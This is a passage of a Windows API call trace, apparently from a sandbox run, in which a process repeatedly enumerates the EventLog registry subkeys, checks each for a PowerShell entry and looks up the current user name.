	[0832.747] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x283d90, lpcchName=0x12d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0832.747] CoTaskMemFree (pv=0x283d90) 
	[0832.748] CoTaskMemFree (pv=0x0) 
	[0832.748] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0832.748] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x283d90, lpcchName=0x12d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0832.748] CoTaskMemFree (pv=0x283d90) 
	[0832.748] CoTaskMemFree (pv=0x0) 
	[0832.748] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0832.748] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x283d90, lpcchName=0x12d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0832.748] CoTaskMemFree (pv=0x283d90) 
	[0832.748] CoTaskMemFree (pv=0x0) 
	[0832.748] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0832.748] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x283d90, lpcchName=0x12d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0832.748] CoTaskMemFree (pv=0x283d90) 
	[0832.748] CoTaskMemFree (pv=0x0) 
	[0832.748] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0832.748] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x283d90, lpcchName=0x12d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0832.748] CoTaskMemFree (pv=0x283d90) 
	[0832.748] CoTaskMemFree (pv=0x0) 
	[0832.748] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0832.748] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x283d90, lpcchName=0x12d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0832.749] CoTaskMemFree (pv=0x283d90) 
	[0832.749] CoTaskMemFree (pv=0x0) 
	[0832.749] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0832.749] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x283d90, lpcchName=0x12d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0832.749] CoTaskMemFree (pv=0x283d90) 
	[0832.749] CoTaskMemFree (pv=0x0) 
	[0832.749] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0832.749] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x283d90, lpcchName=0x12d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0832.749] CoTaskMemFree (pv=0x283d90) 
	[0832.749] CoTaskMemFree (pv=0x0) 
	[0832.749] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x30c) returned 0x0
	[0832.749] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x0) returned 0x2
	[0832.749] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x318) returned 0x0
	[0832.749] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x0) returned 0x2
	[0832.750] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x31c) returned 0x0
	[0832.750] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x0) returned 0x2
	[0832.750] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x320) returned 0x0
	[0832.750] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x0) returned 0x2
	[0832.750] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x324) returned 0x0
	[0832.750] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x0) returned 0x2
	[0832.750] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x328) returned 0x0
	[0832.750] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x0) returned 0x2
	[0832.750] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x32c) returned 0x0
	[0832.750] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x0) returned 0x2
	[0832.750] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x330) returned 0x0
	[0832.751] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x0) returned 0x2
	[0832.751] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x334) returned 0x0
	[0832.751] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x338) returned 0x0
	[0832.751] RegCloseKey (hKey=0x338) returned 0x0
	[0832.751] RegCloseKey (hKey=0x308) returned 0x0
	[0832.752] RegCloseKey (hKey=0x334) returned 0x0
	[0832.763] CoTaskMemAlloc (cb=0x804) returned 0x1b864860
	[0832.763] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b864860, nSize=0x12d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d8e8) returned 0x1
	[0832.764] CoTaskMemFree (pv=0x1b864860) 
	[0832.767] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0832.768] GetUserNameW (in: lpBuffer=0x283d90, pcbBuffer=0x12d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d928) returned 1
	[0832.769] CoTaskMemFree (pv=0x283d90) 
	[0834.955] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d628 | out: phkResult=0x12d628*=0x33c) returned 0x0
	[0834.956] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d59c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d598, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d59c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d598*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.956] CoTaskMemFree (pv=0x0) 
	[0834.956] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0834.956] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.956] CoTaskMemFree (pv=0x283d90) 
	[0834.956] CoTaskMemFree (pv=0x0) 
	[0834.956] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0834.956] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.956] CoTaskMemFree (pv=0x283d90) 
	[0834.956] CoTaskMemFree (pv=0x0) 
	[0834.956] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0834.956] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.956] CoTaskMemFree (pv=0x283d90) 
	[0834.956] CoTaskMemFree (pv=0x0) 
	[0834.956] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0834.957] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.957] CoTaskMemFree (pv=0x283d90) 
	[0834.957] CoTaskMemFree (pv=0x0) 
	[0834.957] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0834.957] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.957] CoTaskMemFree (pv=0x283d90) 
	[0834.957] CoTaskMemFree (pv=0x0) 
	[0834.957] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0834.957] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.957] CoTaskMemFree (pv=0x283d90) 
	[0834.957] CoTaskMemFree (pv=0x0) 
	[0834.957] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0834.957] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.957] CoTaskMemFree (pv=0x283d90) 
	[0834.957] CoTaskMemFree (pv=0x0) 
	[0834.957] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0834.958] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.958] CoTaskMemFree (pv=0x283d90) 
	[0834.958] CoTaskMemFree (pv=0x0) 
	[0834.958] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0834.958] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.958] CoTaskMemFree (pv=0x283d90) 
	[0834.958] CoTaskMemFree (pv=0x0) 
	[0834.958] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x340) returned 0x0
	[0834.958] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0834.958] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x344) returned 0x0
	[0834.958] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0834.958] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x348) returned 0x0
	[0834.959] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0834.959] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x34c) returned 0x0
	[0834.959] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0834.959] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x350) returned 0x0
	[0834.959] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0834.959] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x354) returned 0x0
	[0834.959] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0834.959] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x358) returned 0x0
	[0834.959] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0834.960] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x35c) returned 0x0
	[0834.960] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0834.960] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x360) returned 0x0
	[0834.960] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x364) returned 0x0
	[0834.960] RegCloseKey (hKey=0x364) returned 0x0
	[0834.960] RegCloseKey (hKey=0x33c) returned 0x0
	[0834.961] RegCloseKey (hKey=0x360) returned 0x0
	[0834.961] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d628 | out: phkResult=0x12d628*=0x360) returned 0x0
	[0834.961] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d59c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d598, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d59c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d598*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0834.962] CoTaskMemFree (pv=0x0) 
	[0834.962] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.023] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.023] CoTaskMemFree (pv=0x283d90) 
	[0837.023] CoTaskMemFree (pv=0x0) 
	[0837.023] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.024] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.024] CoTaskMemFree (pv=0x283d90) 
	[0837.024] CoTaskMemFree (pv=0x0) 
	[0837.024] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.024] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.024] CoTaskMemFree (pv=0x283d90) 
	[0837.024] CoTaskMemFree (pv=0x0) 
	[0837.024] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.024] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.024] CoTaskMemFree (pv=0x283d90) 
	[0837.024] CoTaskMemFree (pv=0x0) 
	[0837.024] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.024] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.024] CoTaskMemFree (pv=0x283d90) 
	[0837.024] CoTaskMemFree (pv=0x0) 
	[0837.024] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.024] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.024] CoTaskMemFree (pv=0x283d90) 
	[0837.024] CoTaskMemFree (pv=0x0) 
	[0837.025] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.025] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.025] CoTaskMemFree (pv=0x283d90) 
	[0837.025] CoTaskMemFree (pv=0x0) 
	[0837.025] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.025] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.025] CoTaskMemFree (pv=0x283d90) 
	[0837.025] CoTaskMemFree (pv=0x0) 
	[0837.025] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.025] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x283d90, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.025] CoTaskMemFree (pv=0x283d90) 
	[0837.025] CoTaskMemFree (pv=0x0) 
	[0837.025] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x33c) returned 0x0
	[0837.025] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0837.025] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x364) returned 0x0
	[0837.025] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0837.026] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x368) returned 0x0
	[0837.026] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0837.026] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x36c) returned 0x0
	[0837.026] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0837.026] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x370) returned 0x0
	[0837.026] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0837.026] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x374) returned 0x0
	[0837.026] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0837.026] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x378) returned 0x0
	[0837.026] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0837.027] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x37c) returned 0x0
	[0837.027] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0837.027] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x380) returned 0x0
	[0837.027] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x384) returned 0x0
	[0837.027] RegCloseKey (hKey=0x384) returned 0x0
	[0837.027] RegCloseKey (hKey=0x360) returned 0x0
	[0837.028] RegCloseKey (hKey=0x380) returned 0x0
	[0837.028] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5f8 | out: phkResult=0x12d5f8*=0x380) returned 0x0
	[0837.028] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d56c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d568, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d56c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d568*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.028] CoTaskMemFree (pv=0x0) 
	[0837.028] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.029] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x283d90, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.029] CoTaskMemFree (pv=0x283d90) 
	[0837.029] CoTaskMemFree (pv=0x0) 
	[0837.029] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.029] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x283d90, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.029] CoTaskMemFree (pv=0x283d90) 
	[0837.029] CoTaskMemFree (pv=0x0) 
	[0837.029] CoTaskMemAlloc (cb=0x204) returned 0x283d90
